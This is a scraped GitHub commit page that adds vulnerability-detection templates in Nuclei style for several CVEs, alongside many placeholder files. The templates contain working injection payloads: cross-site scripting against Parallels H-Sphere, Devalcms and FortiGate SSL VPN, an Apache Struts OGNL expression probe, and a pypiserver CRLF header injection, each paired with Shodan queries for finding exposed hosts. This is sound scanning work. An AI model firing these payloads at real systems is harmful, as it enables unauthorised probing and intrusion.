Skip to content

Commit 699762e

Browse files
committed
add some
1 parent 0dd94d0 commit 699762e

File tree

448 files changed

+3370
-27
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

448 files changed

+3370
-27
lines changed

2004/README.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,47 @@
1+
id: CVE-2008-6465
2+
3+
info:
4+
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
5+
author: edoardottt
6+
severity: medium
7+
description: |
8+
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
9+
reference:
10+
- http://www.xssing.com/index.php?x=3&y=65
11+
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
12+
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
13+
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
14+
classification:
15+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
16+
cvss-score: 5.4
17+
cve-id: CVE-2008-6465
18+
cwe-id: CWE-80
19+
metadata:
20+
verified: true
21+
shodan-query: title:"Parallels H-Sphere
22+
tags: cve,cve2008,xss,parallels,h-sphere
23+
24+
requests:
25+
- method: GET
26+
path:
27+
- '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U'
28+
29+
matchers-condition: and
30+
matchers:
31+
- type: word
32+
part: body
33+
words:
34+
- '\" onfocus=alert(document.domain); autofocus'
35+
- 'Please enter login name & password'
36+
condition: and
37+
38+
- type: word
39+
part: header
40+
words:
41+
- 'text/html'
42+
43+
- type: status
44+
status:
45+
- 200
46+
47+
# Enhanced by md on 2022/12/08
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,43 @@
1+
id: CVE-2008-6982
2+
3+
info:
4+
name: Devalcms 1.4a - Cross-Site Scripting
5+
author: arafatansari
6+
severity: high
7+
description: |
8+
Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
9+
reference:
10+
- https://www.exploit-db.com/exploits/6369
11+
- http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download
12+
- https://nvd.nist.gov/vuln/detail/CVE-2008-6982
13+
classification:
14+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
15+
cvss-score: 7.2
16+
cve-id: CVE-2008-6982
17+
cwe-id: CWE-79
18+
metadata:
19+
verified: "true"
20+
tags: cve,cve2008,devalcms,xss,cms,edb
21+
22+
requests:
23+
- method: GET
24+
path:
25+
- '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
26+
27+
matchers-condition: and
28+
matchers:
29+
- type: word
30+
part: body
31+
words:
32+
- 'sub menu for: <script>alert(document.domain)</script>'
33+
34+
- type: word
35+
part: header
36+
words:
37+
- text/html
38+
39+
- type: status
40+
status:
41+
- 500
42+
43+
# Enhanced by md on 2022/09/20
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!

2008/README.md

+2

2010/README.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,39 @@
1+
id: CVE-2012-0394
2+
3+
info:
4+
name: Apache Struts Dev Mode OGNL Injection
5+
author: tess
6+
severity: critical
7+
description: |
8+
The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
9+
reference:
10+
- https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
11+
- https://www.exploit-db.com/exploits/31434
12+
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
13+
- http://www.exploit-db.com/exploits/18329
14+
classification:
15+
cve-id: CVE-2012-0394
16+
metadata:
17+
shodan-query: html:"Struts Problem Report"
18+
verified: "true"
19+
tags: ognl,injection,edb,cve,cve2012,apache,struts
20+
21+
variables:
22+
first: "{{rand_int(1000, 9999)}}"
23+
second: "{{rand_int(1000, 9999)}}"
24+
result: "{{to_number(first)*to_number(second)}}"
25+
26+
requests:
27+
- method: GET
28+
path:
29+
- '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}'
30+
31+
matchers-condition: and
32+
matchers:
33+
- type: word
34+
words:
35+
- '{{result}}'
36+
37+
- type: status
38+
status:
39+
- 200
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!

2012/README.md

+1

2013/README.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
id: CVE-2017-14186
2+
3+
info:
4+
name: FortiGate SSL VPN Web Portal - Cross Site Scripting
5+
author: johnk3r
6+
severity: medium
7+
description: |
8+
Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.
9+
reference:
10+
- https://www.fortiguard.com/psirt/FG-IR-17-242
11+
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
12+
- https://fortiguard.com/advisory/FG-IR-17-242
13+
- https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891
14+
classification:
15+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
16+
cvss-score: 5.4
17+
cve-id: CVE-2017-14186
18+
cwe-id: CWE-79
19+
metadata:
20+
shodan-query: port:10443 http.favicon.hash:945408572
21+
verified: "true"
22+
tags: cve,cve2017,fortigate,xss,fortinet
23+
requests:
24+
- method: GET
25+
path:
26+
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
27+
28+
matchers-condition: and
29+
matchers:
30+
- type: word
31+
part: body
32+
words:
33+
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
34+
35+
- type: word
36+
part: header
37+
words:
38+
- "text/html"
39+
40+
- type: status
41+
status:
42+
- 200
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!

2017/README.md

+1

2018/README.md

+3-3
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
id: CVE-2019-6802
2+
3+
info:
4+
name: Pypiserver 1.2.5 - CRLF Injection
5+
author: 0x_Akoko
6+
severity: medium
7+
description: |
8+
CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI
9+
reference:
10+
- https://vuldb.com/?id.130257
11+
- https://nvd.nist.gov/vuln/detail/CVE-2019-6802
12+
- https://github.com/pypiserver/pypiserver/issues/237
13+
classification:
14+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
15+
cvss-score: 6.1
16+
cve-id: CVE-2019-6802
17+
cwe-id: CWE-79,CWE-74
18+
metadata:
19+
shodan-query: html:"pypiserver"
20+
verified: "true"
21+
tags: cve,cve2019,crlf,generic,pypiserver
22+
23+
requests:
24+
- method: GET
25+
path:
26+
- "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"
27+
28+
matchers:
29+
- type: word
30+
part: header
31+
words:
32+
- 'Set-Cookie: crlfinjection=1;'
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!

2019/README.md

+2-1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Please contibute to implement this poc / vultarget, thanks!

0 commit comments

Comments
 (0)